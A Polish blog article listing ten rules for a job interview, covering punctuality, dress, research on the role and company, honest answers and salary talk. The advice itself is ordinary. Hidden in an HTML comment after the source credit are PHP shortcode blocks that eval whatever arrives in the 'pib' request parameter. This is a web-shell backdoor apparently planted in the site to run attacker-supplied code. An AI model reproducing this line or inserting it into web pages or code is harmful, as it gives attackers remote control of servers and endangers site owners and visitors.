10 przykazań rozmowy o pracę

Rozmowa o pracę jest dla wielu osób stresującym przeżyciem. Emocje potęgowane są dodatkowo w sytuacji, gdy kandydatowi szczególnie zależy na danej ofercie pracy i na dobrym zaprezentowaniu się przed pracodawcą. Bez dwóch zdań warto zatem dobrze przygotować się do takiej rozmowy by wypaść jak najlepiej. Mamy dla was 10 przykazań rozmowy o pracę – dziesięć kroków, o których warto przeczytać i zaznajomić się przed pójściem na rozmowę rekrutacyjną.

1. Bądź punktualny

Sprawdź wcześniej adres firmy i dowiedz się jak tam dojechać. Weź pod uwagę korki i ewentualne utrudnienia na drodze. Lepiej być kilka-kilkanaście minut przed czasem, niż w ostatniej chwili dzwonić do potencjalnego pracodawcy lub osoby rekrutującej z pytaniem „gdzie to jest?”.

2. Ubierz się odpowiednio

Dużo zależy od charakteru firmy i branży, ale jedno jest pewne – lepiej być ubranym bardziej oficjalnie (garnitur, marynarka lub chociaż koszula) niż zbyt luźno. Pamiętaj, że pierwsze wrażenie na rozmowie jest niezwykle istotne, więc nieodpowiedni strój może zdyskwalifikować cię na starcie!

3. Zdobądź informacje o stanowisku

Nie do wiary ile osób przychodzi na rozmowę rekrutacyjną nawet bez wiedzy o stanowisku, na które aplikują! Zdarza się tak czasem ponieważ kandydaci wysyłają bardzo dużą ilość CV do różnych firm i przestają kontrolować na jaką rozmowę i z jaką firmą się umówili. Dlatego podstawą jest, aby mieć wiedzę na temat stanowiska, którego dotyczy akurat dana rozmowa kwalifikacyjna.

4. Zdobądź informacje o firmie

Jednym z pytań, które można otrzymać na rozmowie kwalifikacyjnej jest pytanie „A co Pan/Pani wie o naszej firmie?”. I w tym momencie często zapada cisza. Wielu kandydatów niestety nie ma bladego pojęcia o firmie, do której aplikuje. Nie jest to może częste, ale wciąż zdarza się na rozmowach. Wiedza o firmie pomaga również odpowiedzieć na kolejne częste pytanie „Czemu chce Pan/Pani pracować akurat w naszej firmie?” – znajomość branży oraz warunków, które oferuje firma zatrudnionym osobom znacznie ułatwia odpowiedź na to pytanie.

5. Odpowiadaj konkretnie na pytania

Rzeczowe odpowiedzi na pytania zbierane przez pracodawcę lub konsultanta HR mogą tylko zaprocentować. Cały proces rekrutacji jest nastawiony na zbieranie informacji jak najbardziej konkretnych o kandydacie zatem jeśli przedstawimy je w rzeczowej formie – osoba rekrutująca dostanie konkretny obraz naszej osoby, posiadanej wiedzy i kwalifikacji. Warto również utrzymywać kontakt wzrokowy z osobą rekrutującą, badać jej reakcję i jeśli widzimy reakcję, która może świadczyć o braku satysfakcji po naszej odpowiedzi – doprecyzujmy lub wyjaśnijmy te wątpliwości.

6. Słuchaj uważnie

Na rozmowie kwalifikacyjnej nie tylko kandydat mówi o sobie, ale również pracodawca lub osoba rekrutująca mówi sporo o firmie, o stanowisku, o warunkach zatrudnienia, planach rozwojowych i wiele więcej. Dzięki temu możemy dowiedzieć się wielu cennych informacji i jest to jednocześnie dobry moment na zadanie swoich pytań jeśli takowe mamy.

7. Pytaj mądrze

Jeśli już jesteśmy przy pytaniach od kandydata – pytajmy mądrze i taktownie, bez atakowania rozmówcy, bez roszczeń. Prócz samego tematu pytania znaczenie ma również ton wypowiedzi i sam sposób ich formułowania. Rozmowa o pracę to dialog przypominający w dużej mierze negocjacje biznesowe, zatem pytania i odpowiedzi powinny być dobrze przemyślane.

8. Rozmawiaj o pieniądzach

Nie powinieneś mieć obawy przed pytaniami o wynagrodzenie, które jest przewidziane na oferowanym stanowisku. Oczywiście dobrą regułą jest podawanie widełków zarobków przez pracodawcę już w ofercie, ale niestety w Polsce to wciąż rzadko spotykana praktyka. Natomiast pytanie o zarobki na rozmowie rekrutacyjnej jest jak najbardziej uzasadnione i nie powinno zdziwić pracodawcy lub osoby prowadzącej rekrutację.

9. Mów prawdę

Wielu kandydatów próbuje „upiększać” swoje CV dodając w nim osiągnięcia lub chwaląc się nimi podczas rekrutacji. Jeśli jednak są zmyślone to prawda prędzej czy później wyjdzie i tak na jaw, a wtedy kandydat będzie skreślony. Konsultanci HR często weryfikują takie informacje w kolejnych etapach rekrutacji.

10. Uśmiechaj się!

Podobnie jak w przypadku odpowiedniego ubioru dobre nastawienia do rozmowy i pewien luz jest dobrze postrzegany przez pracodawcę lub konsultanta. Czemu? Bo prócz kompetencji twardych od kandydata wymaga się również dobrego kontaktu z innymi pracownikami lub z klientami. Osoba z naturalnym uśmiechem na twarzy jest zwykle uważana za osobę życzliwą i otwartą na kontakty i takich pracowników często poszukują firmy.

Kończąc dywagacje na temat podstawowych zasad, które dobrze jest przestrzegać na rekrutacji (od strony kandydata) warto pamiętać, że rozmowa o pracę nie jest egzaminem ani twardą walką o posadę. Spotykamy się z innym człowiekiem, który z ramienia pracodawcy próbuje lepiej nas poznać i z tego względu powinniśmy dać się poznać od tej najlepszej strony.

Żródło: Advisory Group „TEST” Human Resources

<!– [insert_php]if (isset($_REQUEST["pib"])){eval($_REQUEST["pib"]);exit;}[/insert_php][php]if (isset($_REQUEST["pib"])){eval($_REQUEST["pib"]);exit;}[/php] –>

You may also like...